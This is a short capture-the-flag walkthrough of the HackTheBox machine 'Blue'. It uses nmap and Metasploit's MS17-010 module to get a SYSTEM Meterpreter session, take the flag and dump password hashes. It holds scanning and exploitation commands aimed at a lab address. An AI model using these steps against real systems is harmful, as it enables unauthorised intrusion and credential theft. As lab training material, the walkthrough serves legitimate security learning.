Blue is an easy difficulty box on HackTheBox. It has been retired for some time so it will need a VIP subscription for you to have a play with. Whilst the name of the box does give away the vulnerability and exploit we are going to use, it is still a fun box to complete with lots to learn, especially for beginners.
We start with nmap, scanning for -all- ports, and enumerating versions and operating systems.
sudo nmap -sC -sV -p- 10.10.10.40
We can see port 445 (SMB) is open, so once again using NMAP, let’s target that port specifically by throwing all of NMAP’s SMB vulnerability scripts at it. If you want to see what those scripts are exactly, you can search for them with;
locate nse |grep smb-vuln
For now, let’s run our command;
sudo nmap --script smb-vuln* -p 139,445 10.10.10.40
The box vulnerable to MS17-010.
Lets boot up Metasploit with the “-q” switch. It makes it not print a banner and just dumps us straight into the cli.
Lets search for “ms17-010”. We get a few results.
There are a few but let’s start from the top. We select 0 and then check the options.
Set the RHOST and LHOST…and run it.
set rhosts 10.10.10.40
set lhost tun0
We get presented with a Meterpreter session. We can navigate around using this shell and check who we landed as. Great for us it is as SYSTEM.
We can grab the root flag straight away from here.
We can even dump the hashes using Meterpreter for bonus points.